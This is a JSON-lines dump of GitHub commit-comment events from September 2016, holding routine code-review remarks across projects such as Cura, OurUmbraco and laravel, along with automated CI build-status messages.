{"id":"4502304305","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18863086,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T12:40:39Z","updated_at":"2016-09-01T12:40:39Z","body":"In the meantime you commented here i looked at the ffmpeg changelog and saw that the scaling is already there - should be just an changed command line !? (sry no real idea how tvh handles it) This would improve the situation.\r\nBtw Kodi has the intel di vaapi implementation (MADI) but well that won't help at ffmpeg ;)"}},"created_at":"2016-09-01T12:40:39Z"}
{"id":"4502306602","type":"CommitCommentEvent","actor":{"login":"vegarringdal"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":18863096,"position":null,"line":null,"path":null,"commit_id":"82169d875652a37eef016dfa40dbdd02e200e0a6","created_at":"2016-09-01T12:41:05Z","updated_at":"2016-09-01T12:41:05Z","body":"think i only would have used overflow-y"}},"created_at":"2016-09-01T12:41:05Z"}
{"id":"4502310386","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18863104,"position":4,"line":64,"path":"resources/qml/Preferences/ProfilesPage.qml","commit_id":"a2f478f2ad9df16e62f40406cf913957d3fac3f1","created_at":"2016-09-01T12:41:50Z","updated_at":"2016-09-01T12:41:50Z","body":"why is this a function and not a bool property? If you made this a property, it would auto-update when base.currentItem, Cura.MachineManager.activeQualityId etc change by QML magic, which would make the create button visibilty and enabled property autoupdate. Or do they autoupdate now as well? QML magic, man!"}},"created_at":"2016-09-01T12:41:50Z"}
{"id":"4502316465","type":"CommitCommentEvent","actor":{"login":"warrenbuckley"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863114,"position":25,"line":462,"path":"OurUmbraco/Our/MigrationsHandler.cs","commit_id":"ccc6fb2043e8b20baad35f8e85e260c28f5501b0","created_at":"2016-09-01T12:43:11Z","updated_at":"2016-09-01T12:43:11Z","body":"I am gonna be picky here with this query @nul800sebastiaan \r\nDo we not have any other way to select or query for this page, such as a different document type, template or...?\r\n\r\nJust querying based on the node name just makes it fragile. What if we decide the page gets renamed to simply `Terms` or `T&Cs`\r\n\r\nI know we are unlikely to do this, but wanted to raise it"}},"created_at":"2016-09-01T12:43:11Z"}
{"id":"4502317424","type":"CommitCommentEvent","actor":{"login":"nul800sebastiaan"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863117,"position":null,"line":null,"path":null,"commit_id":"088ce651c8dbeb79c3ef7f42553c625718a21c79","created_at":"2016-09-01T12:43:24Z","updated_at":"2016-09-01T12:43:24Z","body":"@warrenbuckley You'll need to find a member with a `tos` property updated before today and it would be good to test with a member that hasn't ever accepted the tos, so with an empty `tos` property. Let me know if you need a hand in setting up the project locally."}},"created_at":"2016-09-01T12:43:24Z"}
{"id":"4502319268","type":"CommitCommentEvent","actor":{"login":"whimboo"},"repo":{"name":"mozilla/nightlytt"},"payload":{"comment":{"id":18863123,"position":24,"line":253,"path":"extension/chrome/content/nightly.js","commit_id":"32a43a972d80f2d0bda6f4e81fcdf249bcd4f156","created_at":"2016-09-01T12:43:47Z","updated_at":"2016-09-01T12:43:47Z","body":"Can we simply do a notification which fades away automatically after some seconds and doesn't require the user to press an OK button in a dialog?"}},"created_at":"2016-09-01T12:43:47Z"}
{"id":"4502319548","type":"CommitCommentEvent","actor":{"login":"denniseffing"},"repo":{"name":"instantshare/instantshare"},"payload":{"comment":{"id":18863124,"position":null,"line":null,"path":null,"commit_id":"6629c90dd37bd4a62584184a9655ae39edf17f23","created_at":"2016-09-01T12:43:51Z","updated_at":"2016-09-01T12:43:51Z","body":"Need to rework threading approach."}},"created_at":"2016-09-01T12:43:51Z"}
{"id":"4502321017","type":"CommitCommentEvent","actor":{"login":"brunokiafuka"},"repo":{"name":"brunokiafuka/MyProfileWeb"},"payload":{"comment":{"id":18863127,"position":2,"line":2,"path":"css/main.css","commit_id":"c1aa4b28fcfc554091e0f7622e48efc486bac166","created_at":"2016-09-01T12:44:11Z","updated_at":"2016-09-01T12:44:11Z","body":"Try to create view ports"}},"created_at":"2016-09-01T12:44:11Z"}
{"id":"4502322607","type":"CommitCommentEvent","actor":{"login":"warrenbuckley"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863131,"position":null,"line":null,"path":null,"commit_id":"ccc6fb2043e8b20baad35f8e85e260c28f5501b0","created_at":"2016-09-01T12:44:29Z","updated_at":"2016-09-01T12:44:29Z","body":"This commit is fine apart from the querying which I know we have probably have nothing else to help query against apart from the node name"}},"created_at":"2016-09-01T12:44:29Z"}
{"id":"4502324959","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18863141,"position":92,"line":284,"path":"resources/qml/Preferences/ProfilesPage.qml","commit_id":"a2f478f2ad9df16e62f40406cf913957d3fac3f1","created_at":"2016-09-01T12:44:58Z","updated_at":"2016-09-01T12:44:58Z","body":"Suggested name change: `objectName` instead of `object`, to avoid confusion about the datatype."}},"created_at":"2016-09-01T12:44:58Z"}
{"id":"4502325463","type":"CommitCommentEvent","actor":{"login":"warrenbuckley"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863143,"position":null,"line":null,"path":null,"commit_id":"088ce651c8dbeb79c3ef7f42553c625718a21c79","created_at":"2016-09-01T12:45:06Z","updated_at":"2016-09-01T12:45:06Z","body":"OK will try to setup locally & I'll shout if I get stuck"}},"created_at":"2016-09-01T12:45:06Z"}
{"id":"4502329810","type":"CommitCommentEvent","actor":{"login":"nul800sebastiaan"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863155,"position":25,"line":462,"path":"OurUmbraco/Our/MigrationsHandler.cs","commit_id":"ccc6fb2043e8b20baad35f8e85e260c28f5501b0","created_at":"2016-09-01T12:45:55Z","updated_at":"2016-09-01T12:45:55Z","body":"Nothing will happen if this already ran ;-) \r\n\r\nSo yeah, it's just so we can get something working now, not meant to be bullet proof :)"}},"created_at":"2016-09-01T12:45:55Z"}
{"id":"4502340036","type":"CommitCommentEvent","actor":{"login":"kurtov"},"repo":{"name":"Unact/sencha-common"},"payload":{"comment":{"id":18863170,"position":5,"line":6,"path":"common/overrides/data/field/Date.js","commit_id":"59659f9355719f6b5b1a49c11c49ceac173eccc4","created_at":"2016-09-01T12:47:34Z","updated_at":"2016-09-01T12:47:34Z","body":"tab"}},"created_at":"2016-09-01T12:47:34Z"}
{"id":"4502341804","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"ezpaarse-project/ezpaarse"},"payload":{"comment":{"id":18863182,"position":5,"line":110,"path":"Makefile","commit_id":"fed23ae1cee903a18641ba0ed57079ee49bb25ae","created_at":"2016-09-01T12:47:50Z","updated_at":"2016-09-01T12:47:50Z","body":"ok mais ce la nécessite tout de même un script externe qu'on appel depuis le package.json c'est bien ca ?"}},"created_at":"2016-09-01T12:47:50Z"}
{"id":"4502343504","type":"CommitCommentEvent","actor":{"login":"karasu"},"repo":{"name":"Antergos/Cnchi"},"payload":{"comment":{"id":18863186,"position":null,"line":null,"path":null,"commit_id":"37b497cd485ec9869cfa62a7c2bea0ff98489dee","created_at":"2016-09-01T12:48:06Z","updated_at":"2016-09-01T12:48:06Z","body":"@lots0logs yep, that was my conclusion, too. I still don't know why the other version does not work, but meh..."}},"created_at":"2016-09-01T12:48:06Z"}
{"id":"4502347703","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18863194,"position":null,"line":null,"path":null,"commit_id":"5a819ac0b0bea4f7f67b9b5ea7771d1f3c0db09c","created_at":"2016-09-01T12:48:44Z","updated_at":"2016-09-01T12:48:44Z","body":"It was in the detail report already, now it is shown in the list. I will be implementing a version filter this morning. 1.3.4 was a pre-release brave/electron version (from a beta)."}},"created_at":"2016-09-01T12:48:44Z"}
{"id":"4502352643","type":"CommitCommentEvent","actor":{"login":"ayan4m1"},"repo":{"name":"KSP-CKAN/CKAN"},"payload":{"comment":{"id":18863204,"position":38,"line":901,"path":"Core/ModuleInstaller.cs","commit_id":"f692bb24821951b05f4f35283aafe50d7417ebe9","created_at":"2016-09-01T12:49:33Z","updated_at":"2016-09-01T12:49:33Z","body":"&& is boolean AND, & is bitwise AND."}},"created_at":"2016-09-01T12:49:33Z"}
{"id":"4502353303","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863205,"position":17,"line":17,"path":"src/org/kms/crypto/CryptoMain.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T12:49:39Z","updated_at":"2016-09-01T12:49:39Z","body":"not a good design ? this HashMap should lie somewhere else"}},"created_at":"2016-09-01T12:49:39Z"}
{"id":"4502353779","type":"CommitCommentEvent","actor":{"login":"lots0logs"},"repo":{"name":"Antergos/Cnchi"},"payload":{"comment":{"id":18863206,"position":2,"line":67,"path":"scripts/postinstall.sh","commit_id":"37b497cd485ec9869cfa62a7c2bea0ff98489dee","created_at":"2016-09-01T12:49:43Z","updated_at":"2016-09-01T12:49:43Z","body":"@karasu I think ^this^ is why it wasnt working (doesnt explain why it worked previously and suddenly stopped working though)"}},"created_at":"2016-09-01T12:49:43Z"}
{"id":"4502354336","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18863208,"position":null,"line":null,"path":null,"commit_id":"1acb97ff8e1b44a081190f77c26d482591e5c051","created_at":"2016-09-01T12:49:49Z","updated_at":"2016-09-01T12:49:49Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/353/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T12:49:49Z"}
{"id":"4502356218","type":"CommitCommentEvent","actor":{"login":"drakosha"},"repo":{"name":"danieleds/exceljs"},"payload":{"comment":{"id":18863213,"position":14,"line":256,"path":"lib/stream/xlsx/workbook-writer.js","commit_id":"d5011ba46c5192942d1aa7aa6790a2a0459b54e3","created_at":"2016-09-01T12:50:09Z","updated_at":"2016-09-01T12:50:09Z","body":"@danieleds hmm... yes, i see.... It done everywhere by different ways...\r\n\r\n@guyonroche What do you think about to move xml builders to appropriate classes? Now it done like a hacks."}},"created_at":"2016-09-01T12:50:09Z"}
{"id":"4502358414","type":"CommitCommentEvent","actor":{"login":"dannyhw"},"repo":{"name":"dannyhw/aws-codedeploy-samples"},"payload":{"comment":{"id":18863216,"position":15,"line":191,"path":"load-balancing/elb/common_functions.sh","commit_id":"6d2972807982357ce74ac447d5e7e807a2d84de8","created_at":"2016-09-01T12:50:29Z","updated_at":"2016-09-01T12:50:29Z","body":"method call already generates similar message."}},"created_at":"2016-09-01T12:50:29Z"}
{"id":"4502360453","type":"CommitCommentEvent","actor":{"login":"warrenbuckley"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863218,"position":78,"line":72,"path":"OurUmbraco.Site/Views/Partials/Members/Register.cshtml","commit_id":"00ad76fdd03a95a1e79e7c42a616177223ee9e91","created_at":"2016-09-01T12:50:49Z","updated_at":"2016-09-01T12:50:49Z","body":"So @nul800sebastiaan we are removing a confirm password on registration as well as the Bio"}},"created_at":"2016-09-01T12:50:49Z"}
{"id":"4502362159","type":"CommitCommentEvent","actor":{"login":"dannyhw"},"repo":{"name":"dannyhw/aws-codedeploy-samples"},"payload":{"comment":{"id":18863228,"position":34,"line":34,"path":"load-balancing/elb/test.sh","commit_id":"6d2972807982357ce74ac447d5e7e807a2d84de8","created_at":"2016-09-01T12:51:06Z","updated_at":"2016-09-01T12:51:06Z","body":"Actual deploy code should be placed here"}},"created_at":"2016-09-01T12:51:06Z"}
{"id":"4502362455","type":"CommitCommentEvent","actor":{"login":"tonioo"},"repo":{"name":"modoboa/modoboa-pfxadmin-migrate"},"payload":{"comment":{"id":18863231,"position":null,"line":null,"path":null,"commit_id":"e27797f436854e8c3ab148e6b10bf2a7e00b360d","created_at":"2016-09-01T12:51:10Z","updated_at":"2016-09-01T12:51:10Z","body":"And what about the latest commit ? :)"}},"created_at":"2016-09-01T12:51:10Z"}
{"id":"4502363579","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18863235,"position":81,"line":307,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"bacac1e42e48e240ed2e6e71df999c7e54933de2","created_at":"2016-09-01T12:51:20Z","updated_at":"2016-09-01T12:51:20Z","body":"This matches \"setting\" elements and also \"settings\" elements, and also if the string \"setting\" appears anywhere in the key.  Not quite accurate enough.\r\n\r\nYou mean this:\r\n\r\n`if` element.tag == \"{http://www.ultimaker.com/material/v1.0}setting\":`\r\n"}},"created_at":"2016-09-01T12:51:20Z"}
{"id":"4502368456","type":"CommitCommentEvent","actor":{"login":"danachkov"},"repo":{"name":"ilidima/some.original.name"},"payload":{"comment":{"id":18863245,"position":4,"line":12,"path":"README.md","commit_id":"d0dfcea1bf6eaf96ffeb5c03bdf71619f2d5932c","created_at":"2016-09-01T12:52:10Z","updated_at":"2016-09-01T12:52:10Z","body":"Let's restore the submaster! I miss him/her/it!"}},"created_at":"2016-09-01T12:52:10Z"}
{"id":"4502370625","type":"CommitCommentEvent","actor":{"login":"warrenbuckley"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863254,"position":114,"line":56,"path":"OurUmbraco.Site/Views/Partials/Members/Register.cshtml","commit_id":"00ad76fdd03a95a1e79e7c42a616177223ee9e91","created_at":"2016-09-01T12:52:31Z","updated_at":"2016-09-01T12:52:31Z","body":"So the Bio & Flickr is hidden for any member profiles for legacy yes, @nul800sebastiaan ?"}},"created_at":"2016-09-01T12:52:31Z"}
{"id":"4502372808","type":"CommitCommentEvent","actor":{"login":"danachkov"},"repo":{"name":"ilidima/some.original.name"},"payload":{"comment":{"id":18863257,"position":null,"line":null,"path":null,"commit_id":"d0dfcea1bf6eaf96ffeb5c03bdf71619f2d5932c","created_at":"2016-09-01T12:52:57Z","updated_at":"2016-09-01T12:52:57Z","body":"What shall we do next?"}},"created_at":"2016-09-01T12:52:57Z"}
{"id":"4502373871","type":"CommitCommentEvent","actor":{"login":"pekrau"},"repo":{"name":"SciLifeLab/standalone_scripts"},"payload":{"comment":{"id":18863262,"position":null,"line":null,"path":null,"commit_id":"e81ad96b726e7e541dc6705e556464b56aabfe06","created_at":"2016-09-01T12:53:11Z","updated_at":"2016-09-01T12:53:11Z","body":"\"crappy csvfile\", ha!\r\n\r\nI tend to use `from __future__ import print_function, absolute_import` and `print()`, in order to simplify moving to Python3 eventually. Your choice.\r\n\r\nI can't see anything wrong. But there was a lot of new code... I suppose you have tested it?"}},"created_at":"2016-09-01T12:53:11Z"}
{"id":"4502375640","type":"CommitCommentEvent","actor":{"login":"silbermm"},"repo":{"name":"crdschurch/SS-CMS"},"payload":{"comment":{"id":18863268,"position":null,"line":null,"path":null,"commit_id":"9827912924a645960e1f8b878b35ac9fc62500f0","created_at":"2016-09-01T12:53:30Z","updated_at":"2016-09-01T12:53:30Z","body":"TeamCity Code :: 1. Development :: CMS :: Features [Build 40](http://mp-ci.centralus.cloudapp.azure.com/viewLog.html?buildId=8166&buildTypeId=Code_Development_Cms_Features&guest=1) is now running\n"}},"created_at":"2016-09-01T12:53:30Z"}
{"id":"4502376401","type":"CommitCommentEvent","actor":{"login":"silbermm"},"repo":{"name":"crdschurch/SS-CMS"},"payload":{"comment":{"id":18863274,"position":null,"line":null,"path":null,"commit_id":"9827912924a645960e1f8b878b35ac9fc62500f0","created_at":"2016-09-01T12:53:39Z","updated_at":"2016-09-01T12:53:39Z","body":"TeamCity Code :: 1. Development :: CMS :: Features [Build 40](http://mp-ci.centralus.cloudapp.azure.com/viewLog.html?buildId=8166&buildTypeId=Code_Development_Cms_Features&guest=1) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:09"}},"created_at":"2016-09-01T12:53:39Z"}
{"id":"4502377269","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18863276,"position":null,"line":null,"path":null,"commit_id":"d59298a56c7b30403e0db0682f4d8f01b270c39b","created_at":"2016-09-01T12:53:49Z","updated_at":"2016-09-01T12:53:49Z","body":"Then for what it's worth, I'll include them in the sfs."}},"created_at":"2016-09-01T12:53:49Z"}
{"id":"4502378482","type":"CommitCommentEvent","actor":{"login":"KennedyTedesco"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18863277,"position":null,"line":null,"path":null,"commit_id":"0135851f1a684bbc2f700bf8523fea295825f7ce","created_at":"2016-09-01T12:54:04Z","updated_at":"2016-09-01T12:54:04Z","body":"@GrahamCampbell What about this for the next version?"}},"created_at":"2016-09-01T12:54:04Z"}
{"id":"4502378683","type":"CommitCommentEvent","actor":{"login":"silbermm"},"repo":{"name":"crdschurch/SS-CMS"},"payload":{"comment":{"id":18863279,"position":null,"line":null,"path":null,"commit_id":"9827912924a645960e1f8b878b35ac9fc62500f0","created_at":"2016-09-01T12:54:09Z","updated_at":"2016-09-01T12:54:09Z","body":"TeamCity Code :: 1. Development :: CMS :: Features [Build 41](http://mp-ci.centralus.cloudapp.azure.com/viewLog.html?buildId=8167&buildTypeId=Code_Development_Cms_Features&guest=1) is now running\n"}},"created_at":"2016-09-01T12:54:09Z"}
{"id":"4502379467","type":"CommitCommentEvent","actor":{"login":"silbermm"},"repo":{"name":"crdschurch/SS-CMS"},"payload":{"comment":{"id":18863283,"position":null,"line":null,"path":null,"commit_id":"9827912924a645960e1f8b878b35ac9fc62500f0","created_at":"2016-09-01T12:54:17Z","updated_at":"2016-09-01T12:54:17Z","body":"TeamCity Code :: 1. Development :: CMS :: Features [Build 41](http://mp-ci.centralus.cloudapp.azure.com/viewLog.html?buildId=8167&buildTypeId=Code_Development_Cms_Features&guest=1) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:08"}},"created_at":"2016-09-01T12:54:17Z"}
{"id":"4502382780","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18863287,"position":null,"line":null,"path":null,"commit_id":"0135851f1a684bbc2f700bf8523fea295825f7ce","created_at":"2016-09-01T12:54:52Z","updated_at":"2016-09-01T12:54:52Z","body":"Yeh, I've already PRed this to 5.3. Not to late to break stuff there tbh."}},"created_at":"2016-09-01T12:54:52Z"}
{"id":"4502383488","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18863290,"position":null,"line":null,"path":null,"commit_id":"0135851f1a684bbc2f700bf8523fea295825f7ce","created_at":"2016-09-01T12:55:01Z","updated_at":"2016-09-01T12:55:01Z","body":"This is only a small change."}},"created_at":"2016-09-01T12:55:01Z"}
{"id":"4502386913","type":"CommitCommentEvent","actor":{"login":"ilidima"},"repo":{"name":"ilidima/some.original.name"},"payload":{"comment":{"id":18863295,"position":4,"line":12,"path":"README.md","commit_id":"d0dfcea1bf6eaf96ffeb5c03bdf71619f2d5932c","created_at":"2016-09-01T12:55:42Z","updated_at":"2016-09-01T12:55:42Z","body":"Agreed! The poor little submaster...wonder what's s/he/it doing now :("}},"created_at":"2016-09-01T12:55:42Z"}
{"id":"4502387388","type":"CommitCommentEvent","actor":{"login":"warrenbuckley"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863297,"position":222,"line":162,"path":"OurUmbraco.Site/Views/Partials/Members/Register.cshtml","commit_id":"00ad76fdd03a95a1e79e7c42a616177223ee9e91","created_at":"2016-09-01T12:55:48Z","updated_at":"2016-09-01T12:55:48Z","body":"Can we move the inline CSS & JS to external files @nul800sebastiaan ?"}},"created_at":"2016-09-01T12:55:48Z"}
{"id":"4502392302","type":"CommitCommentEvent","actor":{"login":"KennedyTedesco"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18863314,"position":null,"line":null,"path":null,"commit_id":"0135851f1a684bbc2f700bf8523fea295825f7ce","created_at":"2016-09-01T12:56:47Z","updated_at":"2016-09-01T12:56:47Z","body":"Indeed."}},"created_at":"2016-09-01T12:56:47Z"}
{"id":"4502394690","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18863324,"position":84,"line":310,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"bacac1e42e48e240ed2e6e71df999c7e54933de2","created_at":"2016-09-01T12:57:16Z","updated_at":"2016-09-01T12:57:16Z","body":"(minor point) Aren't these lines just `mapping[key][:]= []`?\r\n"}},"created_at":"2016-09-01T12:57:16Z"}
{"id":"4502394705","type":"CommitCommentEvent","actor":{"login":"ilidima"},"repo":{"name":"ilidima/some.original.name"},"payload":{"comment":{"id":18863325,"position":null,"line":null,"path":null,"commit_id":"d0dfcea1bf6eaf96ffeb5c03bdf71619f2d5932c","created_at":"2016-09-01T12:57:16Z","updated_at":"2016-09-01T12:57:16Z","body":"Resurrect the submaster? :)"}},"created_at":"2016-09-01T12:57:16Z"}
{"id":"4502395807","type":"CommitCommentEvent","actor":{"login":"nul800sebastiaan"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863329,"position":114,"line":56,"path":"OurUmbraco.Site/Views/Partials/Members/Register.cshtml","commit_id":"00ad76fdd03a95a1e79e7c42a616177223ee9e91","created_at":"2016-09-01T12:57:29Z","updated_at":"2016-09-01T12:57:29Z","body":"@warrenbuckley Yes sir! And they serve as a honeypot, if a bot puts content in them, no account will be created :)\r\n"}},"created_at":"2016-09-01T12:57:29Z"}
{"id":"4502396992","type":"CommitCommentEvent","actor":{"login":"HackerCow"},"repo":{"name":"kaupper/skyforge-telegram-chat"},"payload":{"comment":{"id":18863332,"position":4,"line":4,"path":"SkyforgeTelegramBridge_cpp/src/Requests.cpp","commit_id":"4031cad2293c955b2fea81707a31f1d5a5eaa222","created_at":"2016-09-01T12:57:44Z","updated_at":"2016-09-01T12:57:44Z","body":"haha"}},"created_at":"2016-09-01T12:57:44Z"}
{"id":"4502398667","type":"CommitCommentEvent","actor":{"login":"KaptenJansson"},"repo":{"name":"webrtc/apprtc"},"payload":{"comment":{"id":18863335,"position":null,"line":null,"path":null,"commit_id":"6efae80c71e9ed9025b251ee5dd9d161643beb4c","created_at":"2016-09-01T12:58:04Z","updated_at":"2016-09-01T12:58:04Z","body":"Can you paste exactly what you have? Reading the error message it looks like you are hitting a syntax error."}},"created_at":"2016-09-01T12:58:04Z"}
{"id":"4502401441","type":"CommitCommentEvent","actor":{"login":"arsenovic"},"repo":{"name":"arsenovic/clifford"},"payload":{"comment":{"id":18863345,"position":null,"line":null,"path":null,"commit_id":"b8884d88f703b94906662a6c1673af043777f7b5","created_at":"2016-09-01T12:58:37Z","updated_at":"2016-09-01T12:58:37Z","body":"nothing there again. ....\r\n\r\n\r\nalso if says its a binary, which doesnt make sense. what kind of editor are you using?"}},"created_at":"2016-09-01T12:58:37Z"}
{"id":"4502401528","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18863347,"position":null,"line":null,"path":null,"commit_id":"803aa1b2cab6b0aa0bb06ddf4b182c414bc4558b","created_at":"2016-09-01T12:58:38Z","updated_at":"2016-09-01T12:58:38Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32107/testReport/) for this commit**"}},"created_at":"2016-09-01T12:58:38Z"}
{"id":"4502402518","type":"CommitCommentEvent","actor":{"login":"lekma"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18863353,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T12:58:50Z","updated_at":"2016-09-01T12:58:50Z","body":"> (even h265 see screenshot)\r\n\r\nyou vainfo says otherwise (this is all very confusing)"}},"created_at":"2016-09-01T12:58:50Z"}
{"id":"4502403853","type":"CommitCommentEvent","actor":{"login":"dinhnam193"},"repo":{"name":"dinhnam193/nam"},"payload":{"comment":{"id":18863355,"position":null,"line":null,"path":null,"commit_id":"4c2e347882b91d5f0c2edb4977568087b0e080ce","created_at":"2016-09-01T12:59:07Z","updated_at":"2016-09-01T12:59:07Z","body":"ấcf"}},"created_at":"2016-09-01T12:59:07Z"}
{"id":"4502404101","type":"CommitCommentEvent","actor":{"login":"nul800sebastiaan"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863356,"position":78,"line":72,"path":"OurUmbraco.Site/Views/Partials/Members/Register.cshtml","commit_id":"00ad76fdd03a95a1e79e7c42a616177223ee9e91","created_at":"2016-09-01T12:59:10Z","updated_at":"2016-09-01T12:59:10Z","body":"Yup... We actually never had it, I've moved everything from the `~/usercontrols/our.umbraco.org/Signup.aspx` to the new MVC registration form as that's much easier to maintain."}},"created_at":"2016-09-01T12:59:10Z"}
{"id":"4502406657","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18863364,"position":null,"line":null,"path":null,"commit_id":"892640c3428760d8918a103eb0d7dc2cc4286257","created_at":"2016-09-01T12:59:39Z","updated_at":"2016-09-01T12:59:39Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32108/testReport/) for this commit**"}},"created_at":"2016-09-01T12:59:39Z"}
{"id":"4502408288","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863369,"position":11,"line":11,"path":"User.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T12:59:57Z","updated_at":"2016-09-01T12:59:57Z","body":"In User Object you don't need phoneType"}},"created_at":"2016-09-01T12:59:57Z"}
{"id":"4502410730","type":"CommitCommentEvent","actor":{"login":"JKrag"},"repo":{"name":"githubteacher/copenhagen-fun"},"payload":{"comment":{"id":18863378,"position":5,"line":7,"path":"bios/jkrag.md","commit_id":"03347bb26f504511d73f3217122a56edc10d5964","created_at":"2016-09-01T13:00:26Z","updated_at":"2016-09-01T13:00:26Z","body":"Nice touch @praqma-thi "}},"created_at":"2016-09-01T13:00:26Z"}
{"id":"4502411662","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18863379,"position":86,"line":312,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"bacac1e42e48e240ed2e6e71df999c7e54933de2","created_at":"2016-09-01T13:00:35Z","updated_at":"2016-09-01T13:00:35Z","body":"(minor point) This is just `mapping[key].extend(element)`, or not?\r\n"}},"created_at":"2016-09-01T13:00:35Z"}
{"id":"4502411938","type":"CommitCommentEvent","actor":{"login":"JKrag"},"repo":{"name":"githubteacher/copenhagen-fun"},"payload":{"comment":{"id":18863381,"position":null,"line":null,"path":null,"commit_id":"03347bb26f504511d73f3217122a56edc10d5964","created_at":"2016-09-01T13:00:38Z","updated_at":"2016-09-01T13:00:38Z","body":"Thanks"}},"created_at":"2016-09-01T13:00:38Z"}
{"id":"4502412423","type":"CommitCommentEvent","actor":{"login":"abbradar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18863382,"position":114,"line":108,"path":"pkgs/tools/bootloaders/refind/default.nix","commit_id":"191a85349b09a6b360c779ae05a980a8a8e48134","created_at":"2016-09-01T13:00:43Z","updated_at":"2016-09-01T13:00:43Z","body":"Another way to do this: `wrapProgram $out/bin/refind-install --run cd $out/shar/refind`."}},"created_at":"2016-09-01T13:00:43Z"}
{"id":"4502413726","type":"CommitCommentEvent","actor":{"login":"warrenbuckley"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863383,"position":132,"line":112,"path":"OurUmbraco/Our/Controllers/RegisterController.cs","commit_id":"00ad76fdd03a95a1e79e7c42a616177223ee9e91","created_at":"2016-09-01T13:00:57Z","updated_at":"2016-09-01T13:00:57Z","body":"Another lovely content query based on a name of a node, hope we don't ever feel like renaming stuff"}},"created_at":"2016-09-01T13:00:57Z"}
{"id":"4502413834","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863384,"position":13,"line":13,"path":"User.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T13:00:58Z","updated_at":"2016-09-01T13:00:58Z","body":"User can have multiple phone Numbers. Witch Id You'll save here? You don't need it"}},"created_at":"2016-09-01T13:00:58Z"}
{"id":"4502415525","type":"CommitCommentEvent","actor":{"login":"nul800sebastiaan"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863386,"position":222,"line":162,"path":"OurUmbraco.Site/Views/Partials/Members/Register.cshtml","commit_id":"00ad76fdd03a95a1e79e7c42a616177223ee9e91","created_at":"2016-09-01T13:01:20Z","updated_at":"2016-09-01T13:01:20Z","body":"One day! :-))\r\n\r\nI didn't want to have to spend another day learning how LESS works as that's what seems to be set up for the Web.UI.Client solution. I really have no idea how to work with it. If you know and can convert this to proper less, then that would be great. \r\nI can move the javascript to an external script."}},"created_at":"2016-09-01T13:01:20Z"}
